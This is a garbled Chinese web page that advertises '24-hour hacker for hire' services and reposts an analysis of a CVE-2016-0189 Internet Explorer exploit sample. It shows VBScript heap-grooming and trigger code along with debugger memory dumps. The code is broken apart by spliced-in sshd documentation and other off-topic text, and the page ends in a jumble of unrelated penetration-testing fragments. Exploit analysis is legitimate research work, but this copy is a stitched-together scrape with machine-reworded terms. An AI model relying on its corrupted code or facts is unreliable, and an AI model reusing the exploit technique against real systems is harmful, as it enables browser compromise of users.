24小时接单黑客:对疑似CVE-2016-0189原始进犯样本的调试

上一年10月底，我得到一个与群众视界中不太相同的CVE-2016-0189使用样本。开始剖析后，我觉得着这应该是当年CVE-2016-0189的原始进犯文件。其混杂办法和后续呈现的CVE-2017-0149、CVE-2018-8174、CVE-2018-8373完全共同。其使用及加载shellcode的办法也都和后边几个使用共同。
其时我手头有其他作业，并未对该样本进行细心研讨。几天前，我从头翻出了相关样本进行了一番调试。
本文我将描述该CVE-2016-0189样本的使用办法，读者在后边将会看到，使用进程中的错位办法和CVE-2014-6332，CVE-2017-0149，CVE-2018-8174以及CVE-2018-8373简直共同。
之前群众视界中的CVE-2016-0189样本，根本都是参阅这篇文章中揭露的代码，关于这份揭露代码的使用细节，我在之前的文章已有详细剖析。
下面我们来一窥3年前CVE-2016-0189实践0day样本的使用办法。
 
内存布局
原样本中凭借如下代码进入使用函数
document.write(" var obj = {}; obj.toString = function() { my_valueof(); return 0;}; StartExploit(obj); " &Unescape("%3c/script%3e"))
在StartExploit函数中，首要调用prepare函数进行内存布局。每次实行arr2(i) = Null会导致一个tagSAFEARRAY结构体内存被收回。
ReDim arr(0, 0)
arr(0, 0) = 3 '这一步很重要，数字3在错位后会被解释为vbLong类型
...
Sub prepare
 & Sets the number of client alive messages (see below) which may be sent without sshd(8) receiving any messages back from the client. If this threshold is reached while client alive messages are being sent, sshd will disconnect the client, terminating the session. It is important to note that the use of client alive messages is very different from TCPKeepAlive (below). The client alive messages are sent through the encrypted channel and therefore will not be spoofable. The TCP keepalive option enabled by TCPKeepAlive is spoofable. The client alive mechani *** is valuable when the client or server depend on knowing when a connection has become inactive. The default value is 3. If ClientAliveInterval (see below) is set to 15, and ClientAliveCountMax is left at the default, unresponsive SSH clients will be disconnected after approximately 45 seconds. This option applies to protocol version 2 only.

[1][2][3]黑客接单网

nbsp;  Dim arr5()
    ReDim arr5(2)
    For i = 0 To 17
        arr3(i) = arr5
    Next
    For i = 0 To &h7000
        arr1(i) = arr
    Next
    For i = 0 To 1999
        arr2(i) = arr '将 arr2 的每个成员初始化为一个数组
    Next
    For i = 1000 To 100 Step -3
        arr2(i)(0, 0) = 0
        arr2(i) = Null '开释 arr2(100) ~ arr2(1000) 之间 1/3 的元素
    Next
    ReDim arr4(0, &hFFF) '定义 arr4
End Sub
Function StartExploit(js_obj)
    '省掉无关代码
    prepare
    arr4(js_obj, 6) = &h55555555
    For i = 0 To 1999
        If IsArray(arr2(i)) = True Then
            If UBound(arr2(i), 1) > 0 Then
                vul_index = i
                Exit For
     该恶意代码实行起来后，会休眠一段时间，休眠是通过实行80000次函数来完结的，这样做是为了躲避沙箱的检测：       End If
        End If
    Next
    lb_index = LBound(arr2(i), 1)
    If prepare_rw_mem() = True Then
    Else
        Exit Function
    End If
    addr = leak_addr()
    '省掉后续代码
End Function
每个tagSAFEARRAY在内存中占有的巨细为0x30字节，其间后0x20字节存储着tagSAFEARRAY的实践数据。
0:015> !heap -p -a 052a9fb0
    address 052a9fb0 found in
    _HEAP @ 360000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        052a9f98 0007 0000  [00]   052a9fa0    00030 - (busy)
0:015> dd 052a9fa0 l30/4
052a9fa0  00000000 00000000 00000000 0000000c
052a9fb0  08800002 00000010 00000000 0529d640
052a9fc0  00000001 00000000 00000001 00000000
0:015> dt ole32!tagSAFEARRAY 052a9fb0 
   +0x000 cDims            : 2
   +0x002 fFeatures        : 0x880
   +0x004 cbElements       : 0x10
   +0x008 cLocks           : 0
   +0x00c pvData           : 0x0529d640
   +0x010 rgsabound        : [1] tagSAFEARRAYBOUND
整个开释进程形成大约300个0x30巨细的内存空泛。
 
触发缝隙
内存布局完毕后，使用代码通过arr4(js_obj, 6) = &h55555555这一操作进入自定义的my_valueof回调函数，然后在回调函数中从头定义arr4。这导致arr4对应的原pvData内存被开释，并依照所需巨细请求新的内存。
Sub my_valueof()
    ReDim arr4(2, 0)
End Sub
上述句子将导致arr4(2, 0)对应的pvData去请求一块巨细为0x30的内存，凭借相关内存的分配特性，此进程会重用某块方才开释的tagSAFEARRAY内存。
我们来细心看一下arr4(js_obj, 6) = &h55555555句子的实行逻辑。
CVE-2016-0189的成因在于AccessAr绝大多数的电脑运用者并不需求学会开发杀毒软件，也不需求懂杀毒原理，会用就足够了。但关于某些人或许很重要，有的需求了解、有的需求了解，甚至有的需求掌握。ray中遇到javascript方针后可以导致一个对重载函数的回调my_valueof，使用代码在my_valueof将arr4从头定义为arr4(2, 0)，当回调完结再次返回到AccessArray时，arr4相关的tagSAFEARRAY结构体和pvData指针均已被批改，而AccessArray会持续往下实行的时分依然依照arr4(0, 6)在核算元素地址，并将核算得到的地址保存到一个栈变量上。

[1] [2] [3] [4]  下一页

PoC视频见：https://video.golem.de/security/22770/angriff-auf-windows-live-tiles.html 全盘加密（Full-disk encryption）对取证取证专家来说是个非常大的应战。Android 的安全性问题一贯备受注重，Google在Android系统的安全方面也是一贯没有间断过更新，努力做到更加安全的手机移动操作系统。在Android的安全加密方面，加密分全盘加密和文件级加密（Android 7.0 引入）全盘加密在 Android 4.4中引入，在Android 5.0中做了比较大的更新。本文论说的就是全盘加密，以及怎样通过发起一个闪存(flash drive)来破解这种加密办法。假设失常分数满足阈值，输出失常指示。阈值不是静态的，应该根据场景可变，所谓场景例如作业数据量、预定义作业是否存在、失常检测量等。在IDA中翻开程序，在左面栏中找到_main,点击右侧代码栏之一行，看底下的地址就好了。我们记住进口地址就好。24小时接单黑客:对疑似CVE-2016-0189原始进犯样本的调试

一个点是其时目录，两个点是上级目录，两个点加个空格就是一个全新的目录。

if is_system? || is_admin?3. 只是批改文件

(lldb) platform select remote-iostouch pentestlab

下面的指令可以发现悉数的系统中作业的SUID可实行文件

......................arm-linux-androideabi-gdb vmlinux # This could run into an infinite loop in some cases

一个驱动程序可以具有多个设备方针，并且这些方针用链表的办法连接起来。*/

TheFatRat24小时接单黑客:对疑似CVE-2016-0189原始进犯样本的调试

# #* Hook the function of inner class下载设备完毕后，找到bash工作的目录，把对应的bash文件移动到/data/local/tmp下面，并保证有可实行的权限

myTalker=0x17d6b150

沃通签署了我所央求的证书，我的天哪，我取得了github.com、github.io、www.github.io、schrauger.github.com和schrauger.github.io全部这几个域名的证书。在跳过了DNS进口之后，我在本地核算机上设立了一个照应了GitHub主域名的检验网站。在加载了这个网站之后，我看到它的方位为https://github.com，而阅读器闪现，我其时的联接取得了沃通签署的可用证书的加密。

CredSSP（NLA + SSL）

进程：过滤出有http://IP/doc/page/login.asp 页面的机器.
本文标题:24小时接单黑客:对疑似CVE-2016-0189原始进犯样本的调试